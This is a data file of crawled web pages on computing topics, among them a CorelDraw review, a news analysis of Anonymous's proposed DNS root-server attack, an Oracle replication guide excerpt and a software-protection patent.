2015-48/3679/en_head.json.gz/4695 | CorelDraw Turns Sixteen
By Harry McCracken @harrymccrackenMarch 20, 20120 Share
Corel Email
Corel’s flagship software product, CorelDraw, has been around since 1989, making it among the most venerable packages in the business. I’ve been using it nearly that long (since version 2 or 3, I think). Today, the company released CorelDraw X6 — and since the “X” stands for “10,” that means this is the 16th major release of the vector-drawing software for Windows.
When software’s that mature, it’s hard to radically improve it in ways that actually do improve it. And I don’t think Corel really wants to impose sweeping change at this point. Its software has plenty of loyal users, and it wants to keep them loyal by letting them work in a more modern, efficent version of they software they already know.
CorelDraw’s user interface is mostly the same as it’s been for years, and much of what’s new involves technical updates: CorelDraw is now now a 64-bit app that supports multicore processors for better multitasking. It also supports OpenType fonts for more sophisticated typography, and handles Adobe’s CS5 file formats.
There are a bunch of new features, mostly designed with speed and precision in mind — better alignment guides, for instance, and the ability to create different templates for each page of a multi-page document. (Unlike its perennial rival, Adobe Illustrator, CorelDraw has long done desktop publishing as a sideline along with single-page drawing.) Several new vector-drawing tools, including smear, twirl, attract and repel, let you nudge around the points in an object to quickly distort them.
Photo-Paint, the image editor that comes with CorelDraw, was once a serious alternative to Photoshop; it hasn’t evolved much in many years, though, and these days it feels more like a minor bonus than a major reason to pick up the package. But I do like Smart Carver, a new feature which lets you change a photo’s aspect ratio by painting out parts of it and then letting Photo-Paint squish the image without leaving visible seams.
I could go on — the list of additions is lengthy even if none of them are huge — but using X16, I realize that I’m probably a relatively undemanding CorelDraw user. I like the same things I’ve always liked, including the straightforward interface, the Swiss Army Knife-like versatility, the well-done help and examples, the bevy of bundled content (including 1000 OpenType fonts). For everything that’s changed about how I use computers in recent years, here’s one thing that hasn’t: When I’m doing graphics on a Windows computer, I use CorelDraw.
The new version is $499 for the full version and $199 as an upgrade; it’s available as a download now and will arrive in boxed form later this month. | 计算机 |
2015-48/3679/en_head.json.gz/4707 | If #OpGlobalBlackout is a ploy to blackout the entire Internet, could it work?
by Brad McCarty
16 Feb '12, 10:47pm in Insider
http://tnw.to/1DMvW
The idea is seemingly simple: There are 13 servers that control the domain name services around the world. If you manage to take out all 13 of them, you effectively blackout the Internet. That’s what OpGlobalBlackout, an initiative from Anonymous, would like to attempt. But just how realistic is the threat? I was curious, so it was time to ask the experts.
First off, it’s worth noting that #OpGlobalBlackout is initially attributed to an idea to take down Sony’s PlayStation Network, Facebook, the UN and others in response to the closing of Megaupload. But then it evolved. What’s not known is whether the evolution is an elaborate troll, or a real idea. But let’s assume, for the sake of argument and investigation, that the threat is real.
Let’s go back in time a few days, to a message posted on PasteBin. It explained, in detail, the method by which Anonymous (or at least one member who wrote the message) wished to implement, and the effect it would have:
“The principle is simple; a flaw that uses forged UDP packets is to be used to trigger a rush of DNS queries all redirected and reflected to those 13 IPs. The flaw is as follow; since the UDP protocol allows it, we can change the source IP of the sender to our target, thus spoofing the source of the DNS query.”
But something about the plans just didn’t seem solid to me. It seemed, for lack of a better word, too simple. We all know that there can be drastic consequences brought on by simple measures in many instances, but we’re talking about a system that is attacked regularly, and massively. It really couldn’t be this easy, could it?
For that answer, I turned to some experts. I first sent an email over to Matthew Prince of CloudFlare. Even if he wasn’t the right guy, he’d know the right guy. And indeed he did. One of CloudFlare’s employees, David Conrad, formerly served as ICANN’s VP of IT and Research. In one notable moment of his career, he oversaw the signing of the DNS root. That is to say, he’d be a guy with the answers.
A Series of Tubes?
The first point that Conrad brings up to me is this map:
This is a representation of the 13 servers, and all of their various instances, spread around the globe. That is to say that, for every one of the IP address, there are potentially hundreds of different servers that send traffic back to it. This immediately ups the difficulty of what Anonymous is trying to do.
The next point that Conrad makes is that the servers are almost always under attack, but the system has been built and modified to be resistant to these problems. As an example, here’s a graph from a single root server operator, where you can see a spike up to nearly 40,000 queries per second, then another attack shortly after. But nobody was the wiser because of the redundancy of the system:
The particular root server in question here, according to Conrad, has roughly 100 machines distributed around the globe. Each of these machines can handle around 100,000 queries per second. That spike to 40,000 amounts to little more than a drop in the bucket, and Conrad reiterates the fact that it’s not the largest root server operation.
Conrad relates a story from earlier days of the Internet, when during a denial of service (DoS) attack, “3 or 4 of the root server IP addresses” for some people were taken offline. During this time, however, “I don’t believe anyone other than the folks who monitor root servers noticed.”
But there are other factors at work here too, and they’re a bit more human. Even if the attack were overall unsuccessful in bringing down the whole of the Internet, something of the scale that Anonymous is planning would almost certainly impact a non-trivial portion of traffic. In doing that, you’re angering the people that you’re not necessarily trying to affect.
The Human Condition
Dave [yes, the name is fake, until I get permission otherwise] is another person to whom I was referred to for this story. He holds a different position of the same job that Conrad once held. The insight that he gives is more related to the people, rather than the hardware.
It’s worth understanding that each of the server IPs is then decentralized so that it can accept traffic from different places. As Dave tells me, people need to understand the bottleneck that can happen.
For instance, let’s say that (theoretically) each of the servers could handle 40,000 incoming traffic requests. If, suddenly, 100,000 requests were being sent to a server, 60,000 of those are simply dying due to timeouts, thus they’re not effective in the grand scale. There is a bottleneck to that upstream server, and it can not handle the amount of traffic that the server itself can.
“We’ve always explored this, in theory. We’ve put things in place, such as Anycast [a system of addressing in which requests are sent to the topologically nearest node of a group of recievers].”
But it’s not a single Anycast setup. It is, in fact, more along the lines of 50 and, “we’d like to have 100”. Now, multiply that by the 12 other root nameservers, and the multiples of each of those. You’ll start to see why it would take an inordinately huge, organized attack to even make a dent in the system.
But therein lies the exact problem. There’s only so much that can be accounted for, and there’s no way to get to the “leader” of Anonymous to stop an attack. So how much firepower does the group have, and is it able to muster itself in order to effectively accomplish its goal?
The other massive hurdle here is that Anonymous is (largely) using the Internet in order to organize its actions. If an attack on this scale were to be successful, the group then loses its best source of that organization. It’s a bit like the old cartoons where the guy is up in the tree, cutting off a limb, while sitting on the end that will fall.
As is common with any viable threat to the Internet at large, due diligence has to be paid. No system is completely removed from the threat of a massive denial of service attack, but our DNS has been built with that very realization in mind. It’s with that knowledge that precautions have been taken, redundancy has been put in place, and Anonymous’ mission would be incredibly hard to accomplish.
What’s your take? Does Anon have the Internet muscle to take down the whole of the Internet? Even if it could, should it happen? Or is it all just a brilliant disguise for an otherwise-dead mission? Tweet 38 Share 0 Share 0 Email Brad McCarty
a.k.a. Brad McCarty
A music and tech junkie who calls Nashville home, Brad is the Director TNW Academy. You can follow him on Twitter @BradMcCarty. Say thanks
to Brad Contact
More by Brad
The BMW 535d: Proof that diesel cars have a place in the US market
Challenging the stereotypes about diesel cars with the BMW 535d and 328d
Origin PC Chronos review: Over the top performance has never looked this good
TNW Academy announces its WebRTC-powered platform, built by LiveNinja
Pad & Quill’s Cartella case for MacBook Air – Where style dances elegantly with protection
Boombot Rex review: Great sound meets durability in this life-proof Bluetooth speaker
See all stories by Brad | 计算机 |
2015-48/3679/en_head.json.gz/6451 | The Console Isn�t Dead � It�s Evolving by Robert Levitan on 04/10/12 02:09:00 pm 8 comments
At this year’s GDC, as usual, most of the talk was about mobile and PC platform games. The most common questions I heard: “What are you doing on mobile?” “How are you doing your PC distribution?” and “When is your PC game going mobile?” Dedicated gaming consoles, on the other hand, seem to be the platform everybody is quickly forgetting about. Some have even gone so far as to prepare for their inevitable “death.”
Perhaps that’s an overgeneralization. What seems to be actually happening right now is that the lines between PCs, consoles, and mobile devices are blurring, with more functions appearing on every device that had once been the sole domain of a single platform. Mobile devices, particularly tablets, now have amazing graphical capabilities. Ever-growing broadband availability and increasingly powerful laptops are enabling the PC to be a more compelling and more portable gaming device. The content available online for console users is widening every day, and motion controls and touch interfaces have arrived in the form of Kinect, Move, the Vita, and the Wii U.
Is it a fair fight? It’s not that consoles are underpowered or underappreciated – nobody expects the current lineup of gaming hardware, now going on seven years old (with the Xbox 360 released in late 2005), to be a match for recently developed technology. It’s that the consoles’ main draw is getting lost in a sea of other devices that provide high-quality gaming experiences and other core functions. Why would consumers pick consoles when they deliver neither the inherent connectivity nor the portability of a mobile device, nor the versatility, variety of design, and cutting-edge processing power of a personal computer? Right now, thepse competing platforms can do just about everything a console can do, plus a few things they can’t.
In order to stay relevant, dedicated game platforms need to recapture and emphasize the things that they can do that users can’t get from anywhere else. The core of the console’s identity, in many gamers’ minds, is the ability to provide the “hardcore” experience. The triple-A blockbuster games – the next Uncharted or Gears of War or Final Fantasy – are always going to appear on a platform that lets studios show off their advances in graphics, animation, music, and so forth. Those kinds of theatrics are best seen on (what else?) a home theater. Simply by attaching itself to the latest in HD displays, surround sound systems, and utilizing a control system that can be easily used from the couch, the home console is still the best platform for such games.
Speaking of home theaters, the consoles also need to double down on their other entertainment content, namely TV and movie content. Most of this is already in place: console owners can get streaming content from Netflix, Hulu Plus, and other providers via any current console. While these services may also be available on tablets and PCs, consumers prefer to consume their TV on a TV. Right now, the console is the device of choice for this content, but those consoles need to make sure they offer the simplest and most satisfying way to do so, perhaps through better interfaces like Kinect or voice control. Unless, of course, they’re prepared to lose customers to the emerging market of app-enabled Smart TVs.
The next generation of consoles needs to offer just as many options for the acquisition and use of content: expanded digital distribution, for starters. I would go so far as to say it may be time to ditch the disc entirely in favor of purely downloadable offerings, which would also give the publishers (and gamers) the control they’ve been hoping for. Always-on connectivity, a robust digital catalog, and enough expanded storage to make use of them: these are the bare essentials for the next consoles to stay relevant.
This is hardly an impossible task. Sony and Microsoft have already started down this path, but they need to move faster (if possible) or else someone’s going to beat them to the punch: A few weeks ago, rumors circulated about Valve getting into the gaming hardware business, and while the company officially denied those plans (for now!), that possibility was extremely easy for all of us to believe. If Steam could bring its massive catalog and userbase to bear in a couch-and-controller setting, they could turn into a force to rival Microsoft, Sony, and Nintendo.
The console itself is not dead but perhaps the traditional concept of the console is breathing its last breath. As standalone gaming devices, consoles are being swallowed up by increasingly powerful and more versatile devices. The console must be reinvented as a replacement for the “set-top box,” acting as the primary conduit for people to consume all kinds of digital entertainment – games, television, movies, music, and social media.
Rapid changes in technology threaten all media ecosystems. Similar to other media platforms, consoles have a simple choice: evolve or die.
/blogs/RobertLevitan/20120410/168289/The_Console_Isnt_Dead__Its_Evolving.php | 计算机 |
2015-48/3679/en_head.json.gz/6484 | Thyme Out
Houston County
Caledonia Argus Government
Houston county moving forward with looking into upgrades of records management software
Published July 1, 2014 at 9:18 am By Daniel E. McGonigle
The Caledonia Argus
On Monday, June 23 at the regular meeting of the Caledonia city council, the council voted to approve an upgrade of their computer systems and software contingent upon the county board doing the same.
On Tuesday, June 24, Scott Yeiter came before the county commissioners to make a similar request.
The board heard a power point presentation from Yeiter regarding the communication software and hardware upgrades.
“I’m not asking for full approval right now,” noted Yeiter. “What I would like to do is enter into negotiations with LETG.” (the company who would provide the software and technical training needed for the upgrade).
Yeiter noted that the current system is 30 years old. In many cases, he said, the dispatch office doesn’t even know where his officers are located.
“So if they go in the ditch somewhere off a county road, we wouldn’t even be able to find them,” he said.
The system the county is proposing to upgrade is one that Mower, Fillmore and Winona counties just went online with.
LETG is a Minnesota based company and employs former cops who aren’t just computer programers, but know what they’d like to see out of the service.
Another feature of interest is that the system can communicate across law enforcement agencies and different components of the legal process.
“So from 9-1-1 call to conviction this system can communicate throughout the process,” said Yeiter.
The system is expected to cost the county $190,748 with an annual service contract of $28,398. Cities within Houston County would be able to log onto the server, which would be located at the courthouse, and access information across departments.
The individual cities would also incur some costs depending on their sizes.
Caledonia estimated that to fit their vehicles it would be about $27,000 or $9,000 per squad car.
In the power-point that Yeiter presented, Caledonia’s cost read $16,559 for installation and $2,765 per year for service and maintenance.
The county board authorized Yeiter to move forward and work through the bidding process.
He expected the next 30-60 days would be spent working with representatives from LETG on securing funding and coming to an agreement on a price.
The reason Yeiter wanted the vote to occur yet this June, Winona County put Houston County on their Request for Proposal which saved the county time and money. However, that RFP was only good until the end of June. | 计算机 |
2015-48/3679/en_head.json.gz/7510 | The 10 Best Open Source Projects You Should Be Volunteering To Help With
The success of Open Source projects has defied the old saying – too many cooks spoil the broth. If you doubt the success of the open source initiative, you just have to look at Firefox and WordPress, probably two tools that are helping you to read most of the web. Then, you probably are fixing up a date on an Android phone.
My colleague Erez explained Why You Should Contribute To Open Source Projects [Opinion]. You aren’t a coder? Read 8 Ways To Help Open-Source Projects If You’re Not A Coder. You could be a writer, a designer, a translator, just a Facebook or Twitter junkie, or someone who wants to just donate money for the cause. There are different levels where you can put your two bits. And here are ten of the many open source projects where you can.
Mozilla Developer Network
This is where Firefox, Thunderbird, and other Mozilla projects were born. The Mozilla Foundation’s wiki has all the documentation and tools you will need for the Mozilla platform. About:mozilla is a weekly round-up of news and contribution opportunities. You can also watch out for the News & Update section on the wiki homepage where application development information is posted regularly.
The community support forum is also a place where you can contribute your knowhow by troubleshooting problems. Mozilla Forum has subject specific mailing lists and newsgroups. Hiring and work related information can be found here. Mozilla also has The Mozilla Reps program for volunteers. While you are on the Mozilla site, don’t forget to check out the well-designed Learning section for links to HTML, CSS, and JavaScript tutorials.
The Chromium Projects
Chromium and Chromium OS are the open-source projects that develop the Google Chrome browser and Google Chrome OS. The Chromium Projects site hosts the documentation and code related to the Chromium projects and is the single point of reference for developers interested in learning about and contributing to the open-source projects.
Both project sites are neatly organized and you can follow the links which tell how you can volunteer and join the development (for instance, the beta and dev channels). You can also submit patches or do something as plain as join a discussion group. Check out the slideshow which shows you the life of a Chromium developer.
The Apache Software Foundation
The Apache web server project isn’t the only one for this open source community. You can start with the catalog of projects that are in development or in the pipeline and pick one to volunteer for. The open projects are lined up in categories. Developers and users join mailing lists, download releases, report on bugs and errors, and contribute patches. Dive into the Get Involved page to read more. More than any other open source community, the Apache Foundation seeks consistent commitment and membership is granted only to volunteers who have actively contributed to Apache projects over the course.
Drupal is a leading CMS (Content Management System) and is widely used for web authoring. Free and open source, recognizable names like NASA, The White House, Ubuntu, Zynga etc. use Drupal. Drupal has nearly 16000+ themes and 1300+ modules for building rich websites. As a volunteer you can contribute to this development and many more like working on translations and documentation. Hit the Getting Involved page for more details.
GNOME is a desktop environment that works with most Linux distributions. The GNOME project is an international community that is always actively calling for volunteers. If you are a writer, you can also find a place in the GNOME development community for working on developer guides and other content. Each individual role is clearly laid out with guidelines. Coders can head straight to the GnomeLove page which is basically a getting started guide.
Ubuntu is a Linux distribution and behind it a large community of interested developers. The ContributeToUbuntu page introduces you to the kinds of work you can contribute to the operating system. When you think that Ubuntu usually has a six-month development cycle, there’s always work available. Ubuntu, quite uniquely has an Ubuntu Women section. This section encourages women to get involved in the use and development of Ubuntu.
The Modular Object-Oriented Dynamic Learning Environment is a popular open source learning platform. The platform gives you powerful tools to develop full-fledged learning course online. The Learning Management System is constructed with PHP. As the site says – We welcome PHP programmers of course, but you can also contribute through discussions, testing, feedback and documentation. You can contribute to the development of the core platforms or the various modules and plugins.
Joomla like Drupal is content management system for developing full-blown websites. Joomla is built using PHP and MySQL. It is the second most popular CMS after WordPress. From little homepages to e-commerce sites, Joomla sees many applications. In fact, Linux.com is a Joomla site. Joomla has 200,000 community users and contributors. On Joomla, anyone can contribute on any level, even newcomers. You can join any of the Joomla working groups and help the platform reach its open source goals.
Python is an open source programming language (basically a scripting language) and it runs on Windows, Linux/Unix, Mac OS X and can be ported to the Java and .NET virtual machines too. From Wikipedia – Among the users of Python are YouTube, and the original BitTorrent client. Large organizations that make use of Python include Google, Yahoo, CERN, and NASA. The Python Software Foundation pushes the development of the language. The Python’s Developers Guide and The Python Mentors Group are the two go-to sources if you want to volunteer here. Also read the Developer FAQ.
Speed Dreams
An open source game had to be on the list. And though there are many, I have chosen this. The open source and free car racing simulation game is released under the GNU General Public License (GPL). It is derived from the open racing car simulator Torcs. As an end-user you can suggest improvements and as developer you can send in your codes and patched for testing. See the Get Involved page for more details.
Other games you can contribute to are Xonotic, 0 A.D, and VegaStrike among many others.
Well, that’s definitely not all as the open source world is a vast one. Here is a list of open source project repositories where you can find work on many small and big open source projects looking for help:
Google Code
Gamedev
OpenHatch
Also, look into our posts on what’s open source. You can find a few more projects that are looking for help too. In the meantime, we would like a feedback from you – have you worked in an open source project? What was the experience like? What advice would you give to beginners who are looking to take the volunteer path?
Write a Comment anonymous
Try to help out with an issue with Gnome and they were downright nasty about it. I’ve written code and sent patches to several projects before and since. How about listing projects that actually want volunteers instead of just projects that claim they want volunteers.
Saikat
Your feedback is important but I wouldn’t be in a hurry to jump to a conclusion that the whole community behind the project is bad. You know, as in the real world, our perceptions often get colored when we meet one negative character across the counter!
If you looking for more informations about social networking scripts, heres some:
http://www.squidoo.com/create-your-own-social-network-3-best-social-network-engines
azmath
Please volunteer to write Khan Academy inspired textbooks at http://www.katextbook.org/guidelines This is an opensource project to create world class educational textbooks freely available to students across the world. Please volunteer.
Saikat Basu
Thanks for this really useful link. Didn’t know that there was such a project out there. Just imagine the help this could be for students in countries which do not have access to good study material.
Dear Basu, Thanks a lot for your appreciation. We are desperately looking out for volunteers, would you mind spreading the word through your blog?
jay13213
open source should be the only way allowed some more info on
Im after open source projects and idea 100%, open source programing should be the only allowed way to publish online
some other scripts some of them open source
Why You Should Contribute To Open Source Projects [Opinion]
The concept of open-source software is not new, and with huge, successful projects such as Ubuntu, Android, and other Linux-related OS's and apps, I think we can safely say it is a proven model for …
8 Ways To Help Open-Source Projects If You're Not A Coder
We’ve covered why it’s important to contribute to open-source projects, but what if you’re not a coder? You don't have to learn how to program to help your favorite open-source projects. Many non-programmers volunteer some of … | 计算机 |
2015-48/3679/en_head.json.gz/8476 | Results 11 - 20 of 413 | | Sort by: Creator
Date Created (Newest) Date Created (Oldest) Date Added (Newest) Date Added (Oldest) Internet Voting: Issues and Legislation
Creator: Coleman, Kevin J & Nunno, Richard M
Manipulating Molecules: The National Nanotechnology Initiative
Creator: Davey, Michael E
Manipulating Molecules: Federal Support for Nanotechnology Research
Creator: Davey, Michael E.
Description: The Bush Administration has requested $1.277 billion for nanotechnology research for FY2007. Nanotechnology is a newly emerging field of science where scientists and engineers are beginning to manipulate matter at the molecular and atomic levels in order to obtain materials and systems with significantly improved properties. Scientists note that nanotechnology is still in its infancy, with large scale practical applications 10 to 30 year away. Congressional concerns include funding for the National Nanotechnology Initiative (NNI), the potential environmental and health concerns associated with the development and deployment of nanotechnology, and the need to adopt international measurement standards for nanotechnology.
Cybercrime: An Overview of the Federal Computer Fraud and Abuse Statute and Related Federal Criminal Laws
Creator: Doyle, Charles & Weir, Alyssa Bartlett
Description: The federal computer fraud and abuse statute, 18 U.S.C. 1030, protects federal computers, bank computers, and computers used in interstate and foreign commerce. It shields them from trespassing, threats, damage, espionage, and from being corruptly used as instruments of fraud. It is not a comprehensive provision, but instead it fills crack and gaps in the protection afforded by other federal criminal laws. This is a brief sketch of section 1030 and some of its federal statutory companions.
Lasers Aimed at Aircraft Cockpits: Background and Possible Options to Address the Threat to Aviation Safety and Security
Creator: Elias, Bartholomew
Electronic Payments and the U.S. Payments System
Creator: Eubanks, Walter W & Smale, Pauline
Description: This report provides a framework for understanding the paper-based and electronic components of the current U.S. payments system. It begins with a basic overview of the payments system, explaining the relative size and growth of various methods of payment. The report discusses paper-based payments and then examines the operations of wholesale and retail electronic payments. Finally, the report discusses some of the major policy issues concerning the regulation and supervision of electronic payments.
Legal Issues Related to Prescription Drug Sales on the Internet
Creator: Feder, Jody | 计算机 |
2015-48/3679/en_head.json.gz/8483 | 6/14 1 Introduction to Advanced Replication
This chapter explains the basic concepts and terminology related to Advanced Replication.
Overview of Replication
Applications that Use Replication
Replication Objects, Groups, and Sites
Types of Replication Environments
Administration Tools for a Replication Environment
Replication Conflicts
Other Options for Multimaster Replication
If you are using Trusted Oracle, then see your documentation for Oracle security-related products for information about using replication in that environment.
Replication is the process of copying and maintaining database objects, such as tables, in multiple databases that make up a distributed database system. Changes applied at one site are captured and stored locally before being forwarded and applied at each of the remote locations. Advanced Replication is a fully integrated feature of the Oracle server; it is not a separate server.
Replication uses distributed database technology to share data between multiple sites, but a replicated database and a distributed database are not the same. In a distributed database, data is available at many locations, but a particular table resides at only one location. For example, the employees table resides at only the ny.example.com database in a distributed database system that also includes the hk.example.com and la.example.com databases. Replication means that the same data is available at multiple locations. For example, the employees table is available at ny.example.com, hk.example.com, and la.example.com.
Some of the most common reasons for using replication are described as follows:
Replication provides fast, local access to shared data because it balances activity over multiple sites. Some users can access one server while other users access different servers, thereby reducing the load at all servers. Also, users can access data from the replication site that has the lowest access cost, which is typically the site that is geographically closest to them.
Replication provides fast, local access to shared data because it balances activity over multiple sites. Some users can access one server while other users access different servers, thereby reducing the load at all servers.
Disconnected Computing
A materialized view is a complete or partial copy (replica) of a target table from a single point in time. Materialized views enable users to work on a subset of a database while disconnected from the central database server. Later, when a connection is established, users can synchronize (refresh) materialized views on demand. When users refresh materialized views, they update the central database with all of their changes, and they receive any changes that happened while they were disconnected.
Network Load Reduction and Mass Deployment
Replication can be used to distribute data over multiple regional locations. Then, applications can access various regional servers instead of accessing one central server. This configuration can reduce network load dramatically.
You can find more detailed descriptions of the uses of replication in later chapters.
The Advanced Replication feature is automatically installed and upgraded in every Oracle Database installation.
Oracle Database Administrator's Guide for more information about distributed databases
Replication supports a variety of applications that often have different requirements. Some applications allow for relatively autonomous individual materialized view sites. For example, sales force automation, field service, retail, and other mass deployment applications typically require data to be periodically synchronized between central database systems and a large number of small, remote sites, which are often disconnected from the central database. Members of a sales force must be able to complete transactions, regardless of whether they are connected to the central database. In this case, remote sites must be autonomous.
On the other hand, applications such as call centers and Internet systems require data on multiple servers to be synchronized in a continuous, nearly instantaneous manner to ensure that the service provided is available and equivalent at all times. For example, a retail Web site on the Internet must ensure that customers see the same information in the online catalog at each site. Here, data consistency is more important than site autonomy.
Advanced Replication can be used for each of the types of applications described in the previous paragraphs, and for systems that combine aspects of both types of applications. In fact, Advanced Replication can support both mass deployment and server-to-server replication, enabling integration into a single coherent environment. In such an environment, for example, sales force automation and customer service call centers can share data.
Advanced Replication can replicate data in environments that use different releases of Oracle and in environments that run Oracle on different operating systems. Therefore, applications that use data in such an environment can use Advanced Replication.
The following sections explain the basic components of a replication system, including replication objects, replication groups, and replication sites.
Replication Objects
A replication object is a database object existing on multiple servers in a distributed database system. In a replication environment, any updates made to a replication object at one site are applied to the copies at all other sites. Advanced Replication enables you to replicate the following types of objects:
Views and Object Views
Packages and Package Bodies
Procedures and Functions
User-Defined Types and Type Bodies
Indextypes
User-Defined Operators
Regarding tables, replication supports advanced features such as partitioned tables, index-organized tables, tables containing columns that are based on user-defined types, and object tables.
Replication Groups | 计算机 |
2015-48/3679/en_head.json.gz/8991 | 1. | 2 Interview with Gregory Fromenteau By Antonio Neto Web:
http://netocg.blogspot.com
(will
open in new window)
(10740 Views) | 0 Comments
Date Added: 29th November 2011 What does it feel like when you see your environment work in big brand games that people love?
Well I'm proud of the game and that people love it, but Ikeep in mind all the things we didn't have the time to do, and how to do better on the next one. You know artists - never happy with what they have!
Have you had much interaction with fans of the games that you've contributed to? And what are their reactions like when they find out what you do?
Some of my friends are fans of the game; it's always good to have a fresh eye on our work, especially if they are not in the industry. Their comments are really different, it's very interesting to listen to their points of views and their ideas for the next game.. .and sometimes we put those suggestions in the next one when we can do it!
What kinds of art and artists inspire you?
There's a lot! In concept art I think it's still Craig Mullins; for me he's the father of concept art in the industry. His pictures are extremely strong and efficient. After that I've found a lot of inspiration in the old paintings of The Caravage, Piranes etc. John Howe is also one of my favorite classic illustrators.
Where do your ideas and references come from?
They come from books, comics, movies, photos, documentaries - anything that contains pictures. I'm very curious by nature and interested in a lot of subjects. I guess it helps me to have diverse sources of inspiration.
For someone who is just starting their studies, what kind of mix of technical and artistic foundations do you think it's important to have?
I think that in the video game industry both technical and artistic skills are very important and required, because they are very much related to each other. You have to understand how something works technically to get the better result and have the best support from your technical direction.
What advice would you give someone who wants to work in 2D/3D environments? Observe, observe, observe and observe! Movies, photos, comics, travels - anything, really. Be curious. Even if you're not interested by a subject, check it out and you could be surprised. Don't confine your imagination. And if you are more 2D-oriented, draw whenever you have the opportunity. It's like learning a music instrument; the more you practice, the better you will become.
In your opinion, what makes a winning demo reel? For me it's the selection of the work. I prefer to have a portfolio with five kick-ass pictures over fifty average ones. Take the time to select your works, ask your friends and professors for advice, and keep the best in your portfolio. The quality is better than the quantity.
To round things off, what advice and tips would you offer people who are just starting out?
Focus on what you want to do and what you do the best. There are a lot of people on the market and you have to be one of the best to stand out. Don't try to do everything; it's good to know how things works, but if you have a specialty, try to be the best at it and stick to it! And when it's hard, don't forget why you are doing this work. It's because you love it!
About the interviewer:
Antonio Neto is a student from Gnomon School of Visual Effects, who is studying to be a 3D environment artist. He is focused on looking for a way he can replicate the real world inside a computer and create beautiful environments that have the capacity to convince people they're real. When he was young, his dream was to work for Squaresoft on one of the Final Fantasy projects, but now he's aiming for game cinematics - somewhere between feature films and games. < previous page 1 | 2 Related Items.
Interview Top 10 tutorials from October to December
Featuring an introduction to the 3ds Max interface, mastering MODO portraits and more! Check out our most popular tutorials for the last 3 months... ...
Interview Top tips with Pascal Blanché
Ubisoft Montreal senior art director Pascal Blanché divulges his working practices and offers some useful tips for artists... ...
Interview Daniel Vieira Sian: 3D artist interview
3D artist Daniel Sian reveals his portfolio and words of wisdom, following his dual gallery entry in February of Caterpillar and Touch of God... ...
Interview Interview with character artist, Seung-min Kim
Lead character artist, Seung-min Kim, shares some of his awesome characters and talks about creating his Knight in 3ds Max and ZBrush... ...
(ID: 68228, pid: 0) Emmax on Sun, 04 December 2011 6:26pm awesome dude.
Name * Email Address * (Security check) What is the capital of
France? * Your Comment * (Please use plain | 计算机 |
2015-48/3679/en_head.json.gz/9279 | Posted Sierra is back! And bringing King’s Quest with it? By
Fans of old-school PC gaming, listen up: the Sierra label appears to be making a comeback. A teaser site has popped up at Sierra.com for the Activision-owned brand, with the promise of more news to be revealed at August 2014’s Gamescom. Code buried deep within a CSS script on the site contains ASCII characters that mention King’s Quest and Geometry Wars. You might not realize it, but 2007’s Wii/DS game Geometry Wars: Galaxies was published under the Sierra name.
Related: King’s Quest rights revert to Activision as Telltale Games moves to other projects
The buried code was first discovered by a commenter on the IGN news story that points to the teaser site. The code itself is found inside one of the CSS scripts on the page, which is accessible by viewing the page source (you can also click here to go there directly). This is what you see when you get there:
The Sierra brand landed in Activision’s vault following the 2008 merger between Vivendi Games and the mega-publisher. Sierra was first founded in 1979 by husband-and-wife creative leads, Ken and Roberta Williams. The company, which was known as On-Line Systems until a 1982 name change rebranded it as Sierra On-Line, was one of the early popular developers of PC games, specifically graphical adventure games.
Sierra On-Line carried on after the Vivendi merger, with another name change in 2002 establishing it as Sierra Entertainment. The bulk of the studio’s output came prior to the merger, with series’ like King’s Quest, Space Quest, Police Quest, Leisure Suit Larry, Hero’s Quest (renamed to Quest for Glory), Gabriel Knight, and others helping to establish Sierra as one of the early dominant forces in PC game development.
Related: Gods Will Be Watching brings us back to the glory days of dying repeatedly in King’s Quest III
There’s been very little activity for Sierra since the Activision/Vivendi merger, but Gamescom seems poised to change that. The annual consumer and trade show kicks off in Cologne, Germany on August 13 and runs through August 17, so we should hear more soon.
Also watch: Asus ROG GX700 Hands On | 计算机 |
2015-48/3679/en_head.json.gz/9426 | In a method of and apparatus for limiting program execution to only an authorized data processing system, a proprietary program, together with first and second authorization codes, is stored on a magnetic disc or other storage medium. The first and second authorization codes are read. A hardware module containing a pseudorandom number generator unique to the authorized system receives the first authorization code as a key. The resultant number generated by the number generator, which is a function of the key and particular pseudorandom generator algorithm, is compared with the second authorization code in direct or encrypted form. An execution enable signal is generated in response to a positive comparison to enable the stored program to be executed.
1. A software protection apparatus using first and second authorization codes and a pseudorandom number, said software protection apparatus for use with a computer, comprising:an external memory device having computer software and a first authorization code and a second authorization code at selected data locations, wherein said second authorization code is part of a pseudorandom sequence; means for reading said external memory device, said reading means located in the computer; pseudorandom number generator device located in the computer and coupled to said reading means, for generating a pseudorandom number in response to said reading means reading said first authorization code from said external memory device, said first authorization code being read prior to execution of said computer software, said pseudorandom number generator device including a sealed casing, thereby preventing identification of the pseudorandom number generator algorthim; processing means located in the computer and coupled to said reading means and said pseudorandom number generator device, for comparing the pseudorandom number generated by said pseudorandom number generator device with the second authorization code read from selected data locations in said external memory device, said processing means generating an enable signal in response to a positive comparison of the pseudorandom number with the second authorization code for enabling execution of the computer software stored in said external memory device. 2. The software protection apparatus in claim 1 wherein said external memory device includes a floppy disc.
The present invention relates generally to software protection, and more particularly toward a method of and apparatus for enabling execution of software with only a data processing system authorized to execute the software. The software protection method and apparatus are particularly useful in a microprocessor based environment.
Software piracy is rapidly becoming a major problem in data processing and particularly in the personal computer field. Software development for microcomputers, for example, is expensive and time consuming. It is therefore important to the software developer that each authorized user pay for the programs used and not reproduce the programs to be used by others or at other sites. Software piracy is, in practice, difficult to prevent because it is generally easy for users to make multiple copies of the programs for unauthorized users, and easy for competitors to repackage and distribute valuable programs at a fraction of the cost to the original developer. The problem is aggravated by the existence of microcomputers which are becoming widespread.
A number of different types of encryption methods have been provided to attempt to eliminate software piracy. One method involves providing a ROM containing an identification number that is duplicated on a floppy disc containing a program to be executed. The program periodically checks for the presence of the identification ROM. If the identification ROM is not connected in the system during execution of the program, the program crashes.
In a related method, a hardware module or "black box" is connected in a personal computer. Each piece of software is supplied with a magnetic key that physically plugs into the module and contains a coded identification number that matches the identification number on the software. To decode the stored program, the key must be plugged into the module.
In another method, a ROM produces a sequence of executable codes in the normal manner but prohibits the user from randomly accessing the memory addresses. A secret executive routine, built into the ROM, contains a table of the legal next steps for every given step in the program. Only those steps listed in the table can be accessed by the user. Thus, if a program contains a branch to one of two places, only those two places can be examined by the programmer at that time. If a program contains enough branches, it will be virtually impossible for the user to run through every permutation of the program to obtain a complete listing of the code.
Another prior art encryption method is monoalphabetic substitution, wherein each byte of a program is replaced with a substitute byte. Each byte of the enciphered program is deciphered when needed by simple table look-up using a small substitution table that is part of the circuitry on the microprocessor chip.
